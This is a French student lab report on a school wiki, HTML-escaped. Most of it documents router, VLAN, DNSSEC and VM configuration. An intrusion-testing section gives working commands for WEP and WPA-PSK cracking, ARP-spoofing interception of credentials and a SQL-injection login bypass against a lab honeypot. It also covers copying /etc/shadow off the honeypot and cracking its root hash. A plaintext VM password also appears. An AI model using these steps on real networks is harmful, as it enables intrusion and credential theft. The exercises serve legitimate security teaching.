 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
Ce qui a pour effet de générer un fichier zone &amp;quot;db.trompettedelamort.site.signed&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Nous n'avons donc plus qu'a remplacer db.trompettedelamort.site par db.trompettedelamort.site.signed dans le fichier named.conf.local:&lt;br /&gt;
 root@trompettedelamort:~# cat /etc/bind/named.conf.local   &lt;br /&gt;
 //&lt;br /&gt;
 // Do any local configuration here&lt;br /&gt;
 zone &amp;quot;trompettedelamort.site&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.trompettedelamort.site.signed&amp;quot;;&lt;br /&gt;
             allow-transfer { 217.70.177.40;};&lt;br /&gt;
        };&lt;br /&gt;
 // Consider adding the 1918 zones here, if they are not used in your&lt;br /&gt;
 // organization&lt;br /&gt;
 //include &amp;quot;/etc/bind/zones.rfc1918&amp;quot;;&lt;br /&gt;
&lt;br /&gt;
Pour finir il ne reste plus qu'a fournir la clef publique de la clef KSK à gandi.net. Pour se faire il faut se rendre dans &amp;quot;DNSSEC&amp;quot; puis dans &amp;quot;Add an external key&amp;quot;, choisir KSK et &amp;quot;RSA/SHA-1&amp;quot; et renseigner la clef se trouvant dans&lt;br /&gt;
 /etc/bind/trompettedelamort.site.dnssec/trompettedelamort.site-ksk.key &lt;br /&gt;
&lt;br /&gt;
On vérifie avec la commande suivante:&lt;br /&gt;
 dnssec-verify -o trompettedelamort.site db.trompettedelamort.site.signed&lt;br /&gt;
 &lt;br /&gt;
Qui nous renvoie ce résultat:&lt;br /&gt;
 Verifying the zone using the following algorithms: RSASHA1.&lt;br /&gt;
 Zone fully signed:&lt;br /&gt;
 Algorithm: RSASHA1: KSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
                    ZSKs: 1 active, 0 stand-by, 0 revoked&lt;br /&gt;
 ../db.trompettedelamort.site.signed&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==4.5 DNS en IPV6==&lt;br /&gt;
&lt;br /&gt;
Dans le fichier db.trompettedelamort.site il suffit de rajouter deux entrées comme nous l'avons fait en IPV4&lt;br /&gt;
 ns1	IN	AAAA	2001:660:4401:60b2:216:3eff:fe6f:4f0b&lt;br /&gt;
 www	IN	AAAA	2001:660:4401:60b2:216:3eff:fe6f:4f0b&lt;br /&gt;
&lt;br /&gt;
Il faut penser à augmenter le Serial&lt;br /&gt;
Ensuite il suffit de ressigner les zones comme précedemment:&lt;br /&gt;
 dnssec-signzone -o trompettedelamort.site -k trompettedelamort.site-ksk ../db.trompettedelamort.site trompettedelamort.site-zsk&lt;br /&gt;
&lt;br /&gt;
Puis relancer le serveur bind.&lt;br /&gt;
&lt;br /&gt;
Avec la commande:&lt;br /&gt;
 host -t soa trompettedelamort.site ns6.gandi.net&lt;br /&gt;
On peut vérifier que le changement a bien été pris en compte.&lt;br /&gt;
&lt;br /&gt;
=Tests d’intrusion=&lt;br /&gt;
&lt;br /&gt;
==5.1  Exploitation de failles du système (en cours)==&lt;br /&gt;
&lt;br /&gt;
==5.2  Cassage de clef WEP d’un point d’accès WiFi (15/10/2020)==&lt;br /&gt;
&lt;br /&gt;
Avec le packetage aircrack-ng il est possible de casser une clef wep.&lt;br /&gt;
&lt;br /&gt;
Pour se faire on récupère le nom de de notre interface WiFi et son adresse MAC avec :&lt;br /&gt;
 iwconfig&lt;br /&gt;
&lt;br /&gt;
Ensuite pour analyser les packets WiFi qui circulent sur le réseau on se sert de la commande:&lt;br /&gt;
 airodump-ng nomDeMaCarte&lt;br /&gt;
Se faisant, l'interface se met automatiquement en mode monitor.&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite tester le Point d'accés avec une injection test:&lt;br /&gt;
 aireplay-ng -9 -e nomPA -a MACPA nomDeMaCarte&lt;br /&gt;
-9 permet de réaliser un test.&lt;br /&gt;
&lt;br /&gt;
Pour casser la clef WEP, l'algorithme nécessite le plus de vecteur d'initialisation possible. Pour récupérer ces derniers on se sert de la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w output nomDeMaCarte&lt;br /&gt;
-c 3 correspond au canal sur lequel émet notre PA, et output sera le fichier contenant tous les vecteurs d'initialisations.&lt;br /&gt;
&lt;br /&gt;
Pour accélérer l'acquisition de vecteurs d'initialisations,nous allons récupérer tous les paquets ARP émis par le PA et les réinjecter. A chaque réinjection les PA génère un nouveau vecteur d'initialisation, cette technique permet d'accélérer la collecte des vecteurs.&lt;br /&gt;
&lt;br /&gt;
Pour permettre l'injection de paquet ARP dans le PA il faut d'abord associer la carte et le PA:&lt;br /&gt;
 aireplay-ng 1 0 -e nomPA -a MACPA -h MACcarte nomDeMaCarte&lt;br /&gt;
-1 correspond à une fausse authentification et 0 au délais de réassociation.&lt;br /&gt;
&lt;br /&gt;
Une fois que nous avons collecté suffisament de vecteurs nous pouvons lancer l'algorithme de cassage:&lt;br /&gt;
 aircrack-ng -b MACPA output*.cap&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.3  Cassage de mot de passe WPA-PSK par force brute (02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
On commence par mettre l'interface WiFi en mode monitor:&lt;br /&gt;
 airmon-ng start maCarte&lt;br /&gt;
&lt;br /&gt;
Ensuite on lance une écoute généralisée des trames WiFi qui circulent:&lt;br /&gt;
 airodump-ng maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de là on peut récupérer le BSSID, L'ESSID et le canal utilisé par le PA qui nous intéresse, nous avons pris la kracotte03.&lt;br /&gt;
&lt;br /&gt;
Puis pour cibler la recherche on lance la commande suivante:&lt;br /&gt;
 airodump-ng -c 3 --bssid MACPA -w psk maCarte&lt;br /&gt;
&lt;br /&gt;
A partir de la on attend un handshake (émis lors de la connexion d'un utilisateur au PA).&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré il n'y a plus qu'a lancer l'algorithme pour casser la PSK:&lt;br /&gt;
 aircrack-ng -w dictionnaire -b MACPA psk*.cap&lt;br /&gt;
&lt;br /&gt;
Il faut au préalable avoir un dictionnaire contenant toutes les combinaisons qui nous intéressent, dans notre un cas il nous faut toutes les combinaisons possibles sur 8bits en décimale.&lt;br /&gt;
Pour se faire soit on fait un petit programme générant toutes les combinaisons possibles, soit on se sert d'un outil de création de dictionnaire. Nous avons utilisé crunch avec la commande suivante:&lt;br /&gt;
 crunch 8 8 0123456789 -o dictionnaire&lt;br /&gt;
&lt;br /&gt;
Nous avons du attendre quelques heures avant que aircrack nous retourne la clef.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.4  Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP (06/11/2020)==&lt;br /&gt;
&lt;br /&gt;
N'ayant pas accès au eeePC (COVID19) on a créé deux machines virtuelles sur note machine personnelle pour simuler l'environement de TP.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP1.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On transforme la machine '''attacker''' en routeur:&lt;br /&gt;
 attacker@attacker:~/ sysctl -w net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
Puis on lance l'empoisonnement du cache ARP de la victime:&lt;br /&gt;
 attacker@attacker:~/ arpspoof -i enp0s3 -t 192.168.1.74 192.168.1.254&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que l'attaque a bien fonctionné en observant la table ARP de la victime:&lt;br /&gt;
 victime@victime:~/ /arp&lt;br /&gt;
 bbox.lan (192.168.1.254) at 08:00:27:34:f9:27&lt;br /&gt;
 ...&lt;br /&gt;
 attacker (192.168.1.44) at 08:00:27:34:f9:27&lt;br /&gt;
L'adresse MAC de la passerelle par défaut (ma box internet dans ce cas) est la même que celle de la machine '''attacker'''&lt;br /&gt;
&lt;br /&gt;
Lorsque la machine veut communiquer avec l'extérieur, elle passe donc automatiquement par la machine '''attacker''':&lt;br /&gt;
 victime@victime:~/ traceroute 8.8.8.8&lt;br /&gt;
 1 attacker (192.168.1.44)  0.456 ms  0.552 ms 0.537 ms&lt;br /&gt;
 2 bbox.lan (192.168.1.254) 5.071 ms 5.053 ms 4.965 ms&lt;br /&gt;
 ...&lt;br /&gt;
 9 dns.google (8.8.8.8)  13.306 ms 12.759 ms 12.551 ms&lt;br /&gt;
&lt;br /&gt;
On lance wireshark sur '''attacker''' et on se connecte a un site http quelconque sur ''''victime'''. On peut voir transiter en claire les identifiants et mot de passes utilisés pour se connecter au site.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Fichier:ARP2.png|1000px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Même chose avec un logiciel de conversation instantanée non chiffré.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==5.5  Intrusion sur un serveur d’application Web (04/11/2020)==&lt;br /&gt;
===Injection SQL===&lt;br /&gt;
On se rend sur le site http://honey.plil.info. Etant donnée que le but est de s'introduire sur le serveur, on se doute que ce n'est pas l'application la plus sécurisée du monde: une simpl injection SQL pourais faire l'affaire pour obtenir une liste des identifiants de connexion. On renseigne donc les champs '''Identifiant''' et '''Mot de passe''' avec la valeure:&lt;br /&gt;
 ' OR 1 = 1 --&lt;br /&gt;
Bingo! L'application nous retourne un tableau avec des identifiant et mdp, on se connecter avec le profil '''admin'''&lt;br /&gt;
&lt;br /&gt;
===Base de donnée===&lt;br /&gt;
En fouillant un peu sur l'interface web, on se rend compte qu'on a accés a un fichier '''config-db.php ''' (dans l'onglet '''Recherche d'un manuel'''). Ce dernier nous renseigne le mot de passe root d'abministration de la base de donnée. En se connectant à l'interface d'administration du serveur de BDD&lt;br /&gt;
http://honey.plil.info/phpmyadmin/ avec ce mot de passe, on accède au contenue des tables.&lt;br /&gt;
&lt;br /&gt;
Une table en particulier nous interesse: '''users''' dans la base '''test''', puisqu'elle contient les identifiant de connexion ('''rex''')&lt;br /&gt;
&lt;br /&gt;
===connexion au serveur===&lt;br /&gt;
On peut verifier que le serveur est bien accéssible a distance avec:&lt;br /&gt;
 nmap -6 honey.plil.info&lt;br /&gt;
qui nous renseigne que les services http et ssh sont accéssible sur la machine.&lt;br /&gt;
&lt;br /&gt;
On tente donc de se connecter en ssh avec les information récupérées dans la base de donnée.&lt;br /&gt;
&lt;br /&gt;
On a accès a tous les fichier de configuration et nottament les informations sur les utilisateurs que l'on récupère:&lt;br /&gt;
 scp /etc/passwd pifou@zabethXX:~/intrusion/passwd&lt;br /&gt;
 scp /etc/shadow pifou@zabethXX:~/intrusion/shadow&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Cassage du mot de passe root===&lt;br /&gt;
Pour la suite, nous utilisons les commandes de l'utilitaire '''John the Ripper'''.&lt;br /&gt;
La commande suivante nous permet de voir les mots de passe chiffrés des utilisateurs.&lt;br /&gt;
 unshadow ./passwd ./shadow | grep root &amp;gt; pass&lt;br /&gt;
On enregistre la clé de l'utilisateur '''root''' dans un fichier '''pass'''.&lt;br /&gt;
&lt;br /&gt;
Comme nous savons que le mot de passe suis la meme logique que le mot de passe administrateur habituel des machines de projets, on suppose qu'il s'agit d'un répétition de 2 mot de 4 lettre: abcdabcd. On génere un dictionnaire qui permettera de casser le mot de passe chiffé.&lt;br /&gt;
 crunch 4 4 abcdefghijklmnopqrstuvwxyz &amp;gt; dico&lt;br /&gt;
 sed -i 's/\(.*\)/\1\1/' dico&lt;br /&gt;
&lt;br /&gt;
puis on lance le cassage:&lt;br /&gt;
 /usr/sbin/john -w:dico pass&lt;br /&gt;
&lt;br /&gt;
apres quelques minutes, le mot de passe est diponible en clair:&lt;br /&gt;
 /usr/sbin/john --show pass&lt;br /&gt;
&lt;br /&gt;
=Réalisations=&lt;br /&gt;
&lt;br /&gt;
===6.1  Sécurisation de données (11/30/2020)===&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible ici https://archives.plil.fr/vdubois-/PRA.git&lt;br /&gt;
&lt;br /&gt;
===6.2  Chiffrement de données (01/12/2020)===&lt;br /&gt;
&lt;br /&gt;
La documentation de ce point est disponible ici https://archives.plil.fr/vdubois-/PRA.git&lt;br /&gt;
&lt;br /&gt;
===6.3  Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===6.4  Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Egury</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54620</id>
		<title>TP sysres IMA5sc 2020/2021 G1</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA5sc_2020/2021_G1&amp;diff=54620"/>
				<updated>2020-12-14T16:49:39Z</updated>
		
		<summary type="html">&lt;p&gt;Egury : /* 4.4  Sécurisation de serveur DNS par DNSSEC (16/11/2020) */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;TP PRA - Evan Gury &amp;amp; Vincent Dubois - trompettedelamort&lt;br /&gt;
&lt;br /&gt;
Informations générales&lt;br /&gt;
----------------------&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Groupe !! Domaine !! Distribution !! VLAN privé !! IP (VLAN333) !! Netmask (VLAN333) !! Gateway (VLAN333) !! Gateway 6509-E (VLAN333) !! Gateway 9200 (VLAN333) !! IP (publique)&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1&lt;br /&gt;
| trompettedelamort.site&lt;br /&gt;
| Debian 10 Buster&lt;br /&gt;
| 301&lt;br /&gt;
| 100.64.0.28&lt;br /&gt;
| 255.255.255.0&lt;br /&gt;
| 100.64.0.254&lt;br /&gt;
| 100.64.0.1&lt;br /&gt;
| 100.64.0.2&lt;br /&gt;
| 193.48.57.188&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=2  Installation des systèmes d’exploitation (12/10/2020)=&lt;br /&gt;
&lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
 xen-create-image --hostname=trompettedelamort --ip=100.64.0.28 --gateway=100.64.0.2 --netmask=255.255.255.0 --dir=/usr/local/xen --password=pasglop --dist=buster&lt;br /&gt;
&lt;br /&gt;
* Création des disques de stockage sur le serveur de virtualisation (pour tout les binômes):&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton:&lt;br /&gt;
&lt;br /&gt;
** On réquisitionne les deux disques de 2,7To que l'on met dans un groupe&lt;br /&gt;
&lt;br /&gt;
 pvcreate /dev/sde&lt;br /&gt;
 pvcreate /dev/sdf&lt;br /&gt;
 vgcreate storage /dev/sde /dev/sdf&lt;br /&gt;
&lt;br /&gt;
** On créer 2 partitions de 10Go pour chaque binôme:&lt;br /&gt;
&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort1 storage&lt;br /&gt;
 lvcreate -L10G -n trompettedelamort2 storage&lt;br /&gt;
 ...meme chose pour chaque groupe...&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
** On formate nos partitions:&lt;br /&gt;
&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort1&lt;br /&gt;
 mkfs.ext4 /dev/storage/trompettedelamort2&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier de config de la VM (/etc/xen/trompettedelamort.cfg)&lt;br /&gt;
 vif = ['bridge=IMA5sc, ip=100.64.0.84, ...']&lt;br /&gt;
et on indique quel disque utiliser:&lt;br /&gt;
 disk       = [&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/disk.img,xvda2,w',&lt;br /&gt;
               'file:/usr/local/xen/domains/trompettedelamort/swap.img,xvda1,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort1,xvda3,w',&lt;br /&gt;
               'phy:/dev/storage/trompettedelamort2,xvda4,w'&lt;br /&gt;
             ]&lt;br /&gt;
&lt;br /&gt;
* Lancer la VM&lt;br /&gt;
 xl create -c /etc/xen/trompettedelamort.cfg&lt;br /&gt;
&lt;br /&gt;
Ensuite, sur la MV:&lt;br /&gt;
&lt;br /&gt;
* Montage et peuplement des partitions:&lt;br /&gt;
 mount /dev/xvda3 /mnt/xvda3&lt;br /&gt;
 mount /dev/xvda4 /mnt/xvda4&lt;br /&gt;
 mv /var/* /mnt/xvda4&lt;br /&gt;
 # /home est vide donc rien a déplacer&lt;br /&gt;
&lt;br /&gt;
puis on démonte:&lt;br /&gt;
 umount /mnt/xvda3&lt;br /&gt;
 umount /mnt/xvda4&lt;br /&gt;
&lt;br /&gt;
* Modification du fichier /etc/fstab pour monter les répertoires '''var''' et '''home''' sur les partitions crées. On ajoute:&lt;br /&gt;
 /dev/xvda3 /home /ext4 default 0 2&lt;br /&gt;
 /dev/xvda4 /var /ext4 default 0 2&lt;br /&gt;
&lt;br /&gt;
et on applique les modification du fichier fstab:&lt;br /&gt;
 mount -a&lt;br /&gt;
&lt;br /&gt;
=3  Architecture réseau=&lt;br /&gt;
&lt;br /&gt;
==3.1  L’architecture générale (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
La mise en service de l'infrastructure physique (démarrer les routeurs,connexions physiques entre eux et avec le routeur de l'école) a été principalement réalisés par le groupe 14.&lt;br /&gt;
&lt;br /&gt;
==3.2  Les réseaux virtuels (12/10/2020)==&lt;br /&gt;
&lt;br /&gt;
On créer deux VLAN:&lt;br /&gt;
* VLAN131 pour se connecter au routeur de l'école&lt;br /&gt;
* VLAN333 pour accéder aux machines virtuelles sur Capbreton&lt;br /&gt;
&lt;br /&gt;
Cette partie a partiellement été réalisée par le groupe 14 lors de la première séances&lt;br /&gt;
&lt;br /&gt;
==3.5  Interconnexion avec Internet IPv4(15/10/2020 &amp;amp; 02/11/2020)==&lt;br /&gt;
&lt;br /&gt;
Le réseau utilisé pour ce TP est le 193.48.57.176/28 (cohabitation avec les IMA2A5 qui ont 193.48.57.160/27). Nous avons donc a notre disposition 16 adresses IP (193.48.57.176 à 193.48.57.191) parmi lesquelles nous devons réserver :&lt;br /&gt;
* 1 adresse pour le réseau&lt;br /&gt;
* 1 adresse de Broadcast&lt;br /&gt;
* 1 adresse pour le routeur 1 (6509-E)&lt;br /&gt;
* 1 adresse pour le routeur 2 (9200)&lt;br /&gt;
* 1 adresse flottante pour les routeurs (redondance)&lt;br /&gt;
Ce qui nous laisse 11 adresses disponibles pour 13 groupes...Impossible&lt;br /&gt;
&lt;br /&gt;
L'idée est donc de créer un sous réseau 10.64.0.16/28 et de faire de de la Translation d'adresse (NAT) vers 193.48.57.176/28&lt;br /&gt;
Nous économisons ainsi les adresses des routeurs et de diffusion qui n'ont pas besoin d’être translatées.&lt;br /&gt;
&lt;br /&gt;
===OSPF===&lt;br /&gt;
L'OSPF permet aux routeurs dans un même domaine d'échanger des informations sur le réseau. Cela permet aux différents routeurs voisins d'avoir de meilleur tables de routages. On réalise donc cette étape sur les deux routeurs pour qu'ils s'echanges leurs tables entre eux mais également avec le routeur de l'école&lt;br /&gt;
&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.176 255.255.255.0 null0   #Ajout d'une route vers le routeur pour pouvoir ping directement à partir du routeur&lt;br /&gt;
&lt;br /&gt;
 router ospf 1                                          # un numéro de processus                                                                                                         &lt;br /&gt;
  router-id 10.60.0.101                                 # un id pour le routeur (plus petite adresse disponible)&lt;br /&gt;
  log-adjacency-changes                                                                                  &lt;br /&gt;
  summary-address 193.48.57.176 255.255.255.240         # adresse que l'on souhaite diffuser aux voisins (addresse du VLAN 333)                                                                                                            &lt;br /&gt;
  summary-address 100.60.0.0 255.240.0.0 not-advertise  # address q'on veut pas diffuser (celle du reseau privé)&lt;br /&gt;
  summary-address 10.0.0.0 255.0.0.0 not-advertise      # address q'on veut pas diffuser (?)                                                                                                             &lt;br /&gt;
  redistribute connected subnets                        # autorise la diffusion pour les nouveaux réseaux qui peuvent être connectés   &lt;br /&gt;
  redistribute static subnets                                                                                                                        &lt;br /&gt;
  network 192.168.222.8 0.0.0.7 area 2                  # domaine de diffusion OSPF (Attention au masque inversé)&lt;br /&gt;
&lt;br /&gt;
On peut vérifier le bon fonctonnement avec un ping vers l'adresse globale routeur de l'école&lt;br /&gt;
 ping 193.48.57.48&lt;br /&gt;
&lt;br /&gt;
De plus, on constate de nouvelles routes partagé par le routeur de l'école (&amp;quot;O&amp;quot; au début de la ligne)&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
On fait la meme chose en changeant le router-id : 10.60.0.102&lt;br /&gt;
&lt;br /&gt;
===NAT===&lt;br /&gt;
On cherche à réaliser une translation d'IP (NAT static) et non une mascarade (injection = NAT Dynamic)&lt;br /&gt;
 ip nat inside source static network 100.64.0.16 193.48.57.176 /28&lt;br /&gt;
Cela permet d'associer les adresse non routées de 100.64.0.16 à 100.64.0.28 aux adresse routées de 193.48.57.176 à 193.48.57.188&lt;br /&gt;
Il faut ensuite indiquer ques sont les VLAN concernés par la translation:&lt;br /&gt;
 int vlan 131&lt;br /&gt;
  ip nat outside&lt;br /&gt;
  exit&lt;br /&gt;
 int  vlan 333&lt;br /&gt;
  ip nat inside&lt;br /&gt;
  exit&lt;br /&gt;
&lt;br /&gt;
===Problème association OSPF et NAT===&lt;br /&gt;
Il semblerait que l'association de l'OSPF et du NAT soit plus complexe que prévu: les deux fonctionnent bien indépendamment mais pas ensemble. En effet, l'OSPF n'annonce pas les routes vers 100.64.0.16/28 donc aucune communication vers l'exterieur n'est possible.&lt;br /&gt;
&lt;br /&gt;
Pour palier à ce problème, on déclare 100.64.0.0/24 sur VLAN333 et annonce manuellement les routes entre 193.48.57.176 et 100.640.16 (plus de NAT).&lt;br /&gt;
La configuration du 9200 a été faite par M. Redon, on s'occupe du 6509-E :&lt;br /&gt;
 boot&lt;br /&gt;
 enable&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 no ip address 193.48.57.161 255.255.255.224 #on enleve l'ancienne ip routée&lt;br /&gt;
 ip address 100.64.0.1 255.255.255.0&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
on modifie également l'identifiant de l'ospf 1 qui était en conflit avec celui des IMA2A5:&lt;br /&gt;
 router ospf 1&lt;br /&gt;
 router-id 10.60.100.1&lt;br /&gt;
&lt;br /&gt;
Enfin, on ajoute la route vers notre MV à la main:&lt;br /&gt;
&lt;br /&gt;
 ip route 193.48.57.188 255.255.255.255 100.64.0.28&lt;br /&gt;
&lt;br /&gt;
Puis on configure notre machine virtuelle de manière a ce qu'elle ait les deux IP (100.64.0.28 et 193.48.57.188)(cf. partie suivante). &lt;br /&gt;
&lt;br /&gt;
Les paquets venant de l'extérieur sont propagé à destination de 193.48.57.188 au routeur (6509-E ou 9200) puis vers 100.64.0.28 sur le VLAN333 suivant la route indiquée précédemment. Les paquets émis par notre machine virtuelle sont transmis à la passerelle par défaut (100.64.0.1 si 6509-E ou 100.64.0.2 si 9200) (comme spécifié avec le mot clé &amp;quot;src&amp;quot; lors de l'établissement des routes) puis le routeur connait les routes pour sortir en passant par le routeur de l'école.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.6  Interconnexion avec Internet (IPv6)(02/11/2020)==&lt;br /&gt;
Le groupe 14 c'est occupé de configurer le vlan333 pour qu'il utilise des ipv6&lt;br /&gt;
&lt;br /&gt;
On crée le VLAN301 pour notre domaine:&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.1 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference High #car routeur principale&lt;br /&gt;
&lt;br /&gt;
* '''sur 6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 vlan 301&lt;br /&gt;
 name trompettedelamort&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 no shutdown&lt;br /&gt;
 ip address 10.60.101.2 255.255.255.0&lt;br /&gt;
 ipv6 enable&lt;br /&gt;
 ipv6 address 2001:660:4401:60b3::0/64 eui-64&lt;br /&gt;
 ipv6 nd prefix 2001:660:4401:60b3::0/64 1000 900&lt;br /&gt;
 ipv6 nd router-preference Low&lt;br /&gt;
&lt;br /&gt;
Annonce de route avec RIP fait par groupe 14&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==3.7  Sécurisation du réseau (02/11/2020)==&lt;br /&gt;
En partenariat avec le groupe 14.&lt;br /&gt;
Attention la syntaxe est différente entre le 9200 et le 6509-E&lt;br /&gt;
On configure la redondance avec l'adresse flottante pour les VLAN333 et VLAN1 ainsi que pour le notre VLAN301.&lt;br /&gt;
'''6509-E'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 ip 100.64.0.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 33 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 33 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 31 ip 10.60.100.254 # adresse flottante des routeur dans vlan333&lt;br /&gt;
 vrrp 31 preemt # priorité au routeur qui a une priorité supérieur&lt;br /&gt;
 vrrp 31 priority 110 # priorité supérieur a celle du 9200&lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 ip 10.60.101.254 # adresse flottante des routeur dans notre vlan&lt;br /&gt;
 vrrp 41 preemt&lt;br /&gt;
 vrrp 41 priority 110&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
'''9200'''&lt;br /&gt;
 conf t&lt;br /&gt;
 int vlan 333&lt;br /&gt;
 vrrp 33 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 100.64.0.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 1&lt;br /&gt;
 vrrp 31 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.100.254&lt;br /&gt;
 preemt &lt;br /&gt;
 exit&lt;br /&gt;
 int vlan 301&lt;br /&gt;
 vrrp 41 address-family ipv4&lt;br /&gt;
 priority 100&lt;br /&gt;
 address 10.60.101.254&lt;br /&gt;
 preemt&lt;br /&gt;
 exit&lt;br /&gt;
 exit&lt;br /&gt;
 write&lt;br /&gt;
&lt;br /&gt;
==3.8  Interconnexion Internet de secours (IPv4) (30/11/2020)==&lt;br /&gt;
(En collaboration avec le groupe 14)&lt;br /&gt;
&lt;br /&gt;
===ISR4331===&lt;br /&gt;
On commcence par connecter l'ISR au boitier SDSL dans le local technique SR52. Pour cela, on repère le port de connexion: &lt;br /&gt;
 SR52# int Gi0/37&lt;br /&gt;
 SR52# switchport mode access&lt;br /&gt;
 SR52# switchport access vlan 531&lt;br /&gt;
&lt;br /&gt;
Puis on configure le nouveau VLAN 531 sur l'ISR (!Attention! sur cet équipement, l'équivalent VLAN est BDI)&lt;br /&gt;
&lt;br /&gt;
 ISR4331# int BDI531&lt;br /&gt;
 ISR4331# ip address 192.168.222.26 255.255.255.248&lt;br /&gt;
 ISR4331# no shut&lt;br /&gt;
 ISR4331# exit  &lt;br /&gt;
 ISR4331# int GigabitEthernet0/0/1 &lt;br /&gt;
 ISR4331# service instance 531 ethernet&lt;br /&gt;
 ISR4331# encapsulation untagged&lt;br /&gt;
 ISR4331# bridge-domain 531&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
&lt;br /&gt;
On configure également le BDI 333 avec VRRP pour que les VM accède à ce router. Cet équipement aura une priorité VRRP inférieure aux deux autres routeurs car il est destiné a tourner qu'en cas de problème de connexion par le routeur de l'école. &lt;br /&gt;
&lt;br /&gt;
 ISR4331# int BDI 333&lt;br /&gt;
 ISR4331# ip address 100.64.0.3 255.255.255.0&lt;br /&gt;
 ISR4331# vrrp 33 ip 100.64.0.254&lt;br /&gt;
 ISR4331# vrrp 33 preempt&lt;br /&gt;
 ISR4331# vrrp 33 priority 90&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
&lt;br /&gt;
On y ajoute les ports reliés aux routeurs&lt;br /&gt;
&lt;br /&gt;
 ISR4331# int Gi0/0/0 &lt;br /&gt;
 ISR4331# service instance 333 ethernet&lt;br /&gt;
 ISR4331# encapsulation dot1q 333&lt;br /&gt;
 ISR4331# rewrite ingress tag pop 1 symmetric&lt;br /&gt;
 ISR4331# bridge-domain 333&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
&lt;br /&gt;
 ISR4331# int Gi0/0/2&lt;br /&gt;
 ISR4331# service instance 333 ethernet&lt;br /&gt;
 ISR4331# encapsulation dot1q 333&lt;br /&gt;
 ISR4331# rewrite ingress tag pop 1 symmetric&lt;br /&gt;
 ISR4331# bridge-domain 333&lt;br /&gt;
 ISR4331# exit&lt;br /&gt;
&lt;br /&gt;
===SLA===&lt;br /&gt;
A ce stade, nos équipement sont connecté mais on ne sait pas quand l'ISR4331 doit prendre la main.&lt;br /&gt;
